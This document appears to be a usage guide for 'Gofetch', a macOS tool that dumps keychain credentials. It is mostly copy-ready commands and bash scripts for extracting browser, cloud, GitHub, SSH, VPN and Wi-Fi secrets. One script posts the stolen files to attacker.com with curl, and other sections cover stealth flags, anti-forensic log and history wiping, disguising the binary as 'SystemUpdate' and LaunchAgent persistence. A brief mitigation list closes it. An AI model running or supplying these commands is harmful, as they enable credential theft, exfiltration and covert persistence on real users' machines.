Gofetch
Gofetch is a macOS credential dumping tool that exploits the keychain to extract stored credentials without requiring user passwords. It accesses Safari, Chrome, Firefox, and system credentials including SSH keys, AWS credentials, GitHub tokens, and development tool authentication.
Installation
# Clone repository
git clone https://github.com/runtimeterror/gofetch.git
cd gofetch
# Compile for macOS
cargo build --release
# Or use precompiled binary
wget https://github.com/runtimeterror/gofetch/releases/download/v1.0/gofetch-macos
chmod +x gofetch-macosBasic Keychain Operations
Dump All Credentials
# Extract all keychain items
./gofetch-macos --dump-all
# Output formats
./gofetch-macos --dump-all --format json --output keychain.json
./gofetch-macos --dump-all --format csv --output keychain.csv
./gofetch-macos --dump-all --pretty-print
# Include metadata
./gofetch-macos --dump-all --with-metadata
./gofetch-macos --dump-all --include-timestampsList Available Services
# Show all available services
./gofetch-macos --list-services
# Typical services found:
# - Safari
# - Chrome
# - Firefox
# - AWS
# - GitHub
# - GitLab
# - Slack
# - Docker
# - NPM
# - KubernetesBrowser Credential Extraction
Safari Credentials
# Extract Safari passwords
./gofetch-macos --safari
# Get Safari credentials for specific domain
./gofetch-macos --browser safari --domain github.com
# Extract all Safari data
./gofetch-macos --service Safari --extract-all
# Safari autofill data
./gofetch-macos --safari --autofillChrome Credentials
# Extract Chrome saved passwords
./gofetch-macos --chrome
# All Chrome profiles
./gofetch-macos --chrome --all-profiles
# Chrome autofill data
./gofetch-macos --chrome --autofill
# Chrome saved payment methods
./gofetch-macos --chrome --payment-methodsFirefox Credentials
# Extract Firefox login manager
./gofetch-macos --firefox
# Firefox stored passwords
./gofetch-macos --browser firefox --dump-passwords
# Firefox sync tokens
./gofetch-macos --firefox --sync-tokensCloud & Development Credentials
Cloud Providers
# AWS credentials
./gofetch-macos --aws
# Azure/Microsoft credentials
./gofetch-macos --azure
# Google Cloud credentials
./gofetch-macos --gcp
# All cloud credentials
./gofetch-macos --cloud-allDevelopment Tools
# GitHub tokens and credentials
./gofetch-macos --github
# GitLab credentials
./gofetch-macos --gitlab
# Docker credentials
./gofetch-macos --docker
# Kubernetes kubeconfig
./gofetch-macos --kubernetes
# NPM tokens
./gofetch-macos --npm
# SSH keys from keychain
./gofetch-macos --ssh-keysVPN & Network
# VPN credentials
./gofetch-macos --vpn
# SSH known hosts
./gofetch-macos --ssh-known-hosts
# SSH private keys
./gofetch-macos --ssh-keys --extract
# Wireless network passwords
./gofetch-macos --wifi-passwordsKeychain Enumeration
Keychain Chains
# System keychain
./gofetch-macos --keychain system
# Local items keychain
./gofetch-macos --keychain local-items
# iCloud keychain
./gofetch-macos --keychain icloud
# All keychains
./gofetch-macos --all-keychainsItem Details
# Get detailed item information
./gofetch-macos --item-details
# Include security attributes
./gofetch-macos --dump-all --security-attrs
# Show last accessed times
./gofetch-macos --dump-all --access-times
# Include creation dates
./gofetch-macos --dump-all --metadataStealthy Extraction
Minimize Detection
# Silent mode
./gofetch-macos --dump-all --silent
# No notifications
./gofetch-macos --dump-all --no-notify
# Quiet output
./gofetch-macos --dump-all --quiet
# Background execution
./gofetch-macos --dump-all --backgroundAccessibility Bypass
# Check accessibility status
./gofetch-macos --check-access
# Grant accessibility permissions
./gofetch-macos --grant-access
# Request access without prompting
./gofetch-macos --request-access --silent
# Skip access check
./gofetch-macos --skip-access-checkCredential Extraction Workflows
Complete Credential Dump
#!/bin/bash
# Comprehensive credential extraction
TARGET_USER="$1"
OUTPUT_DIR="credentials_$(date +%Y%m%d)"
mkdir -p "$OUTPUT_DIR"
echo "[*] Starting credential extraction..."
# Extract all credentials
./gofetch-macos --dump-all --format json \
--output "$OUTPUT_DIR/all_credentials.json"
# Extract browser credentials
echo "[*] Extracting browser data..."
./gofetch-macos --safari --output "$OUTPUT_DIR/safari_creds.json"
./gofetch-macos --chrome --output "$OUTPUT_DIR/chrome_creds.json"
./gofetch-macos --firefox --output "$OUTPUT_DIR/firefox_creds.json"
# Extract cloud credentials
echo "[*] Extracting cloud credentials..."
./gofetch-macos --aws --output "$OUTPUT_DIR/aws_creds.json"
./gofetch-macos --azure --output "$OUTPUT_DIR/azure_creds.json"
./gofetch-macos --gcp --output "$OUTPUT_DIR/gcp_creds.json"
# Extract development credentials
echo "[*] Extracting dev credentials..."
./gofetch-macos --github --output "$OUTPUT_DIR/github_creds.json"
./gofetch-macos --docker --output "$OUTPUT_DIR/docker_creds.json"
./gofetch-macos --npm --output "$OUTPUT_DIR/npm_creds.json"
# Extract SSH keys
echo "[*] Extracting SSH keys..."
./gofetch-macos --ssh-keys --output "$OUTPUT_DIR/ssh_keys.json"
# Consolidate all findings
cat "$OUTPUT_DIR"/*_creds.json | jq -s add > "$OUTPUT_DIR/all_extracted.json"
echo "[+] Credential extraction complete"
echo "[+] Results in: $OUTPUT_DIR"Targeted High-Value Extraction
#!/bin/bash
# Extract only critical credentials
echo "[*] Extracting high-value credentials..."
# Development & DevOps
./gofetch-macos --github --output github.json
./gofetch-macos --gitlab --output gitlab.json
./gofetch-macos --docker --output docker.json
./gofetch-macos --kubernetes --output k8s.json
# Cloud platforms
./gofetch-macos --aws --output aws.json
./gofetch-macos --gcp --output gcp.json
./gofetch-macos --azure --output azure.json
# Network access
./gofetch-macos --vpn --output vpn.json
./gofetch-macos --ssh-keys --output ssh.json
# Exfiltrate extracted data
echo "[*] Exfiltrating data..."
for file in github.json gitlab.json docker.json aws.json gcp.json azure.json; do
if [ -f "$file" ]; then
# Send to attacker server
curl -X POST http://attacker.com/exfil --data-binary "@$file"
fi
done
# Clean up
rm *.jsonEvidence Removal
Clean Up Artifacts
# Clear recent items
./gofetch-macos --clear-recent
# Remove application caches
./gofetch-macos --clear-cache
# Delete temporary files
./gofetch-macos --clear-temp
# Clear logs
./gofetch-macos --clear-logsAnti-Forensics
# Shred output files
./gofetch-macos --dump-all --output keychain.json --shred-output
# Disable logging
./gofetch-macos --dump-all --no-logging
# Self-destruct after execution
./gofetch-macos --dump-all --self-destruct
# Clear bash history
history -c
# Secure delete
shred -vfz -n 3 sensitive_files.jsonDetection Evasion
Blend In
# Run during user activity
./gofetch-macos --dump-all --quiet
# Rename executable
mv gofetch-macos SystemUpdate
# Copy to legitimate location
cp gofetch-macos /Library/LaunchAgents/
# Create LaunchAgent for persistence
cat > ~/Library/LaunchAgents/com.apple.update.plist << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ...>
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.update</string>
<key>ProgramArguments</key>
<array>
<string>/path/to/gofetch-macos</string>
<string>--dump-all</string>
</array>
</dict>
</plist>
EOFFiltering Results
Parse Extracted Data
# Extract only passwords
jq '.[] | select(.password) | {account, password}' keychain.json
# Find API keys
jq '.[] | select(.label | contains("api")) | {label, value}' keychain.json
# Extract GitHub tokens
jq '.[] | select(.label | contains("github")) | .password' keychain.json
# SSH keys only
jq '.[] | select(.type == "ssh") | {label, key}' keychain.jsonSecurity Implications
- Requires code execution access on macOS
- Bypasses some macOS security prompts
- Extracts plaintext credentials from keychain
- Accesses browser stored passwords
- Can harvest SSH keys and API credentials
- Enables mass credential theft
Mitigation Strategies
- Use Secure Enclave for credential storage
- Disable automatic keychain unlock
- Enable audit logging for keychain access
- Monitor for suspicious process execution
- Implement strong user authentication
- Enable SIP (System Integrity Protection)
- Keep macOS updated
- Use separate keychains for sensitive credentials
References
Last updated: 2026-03-30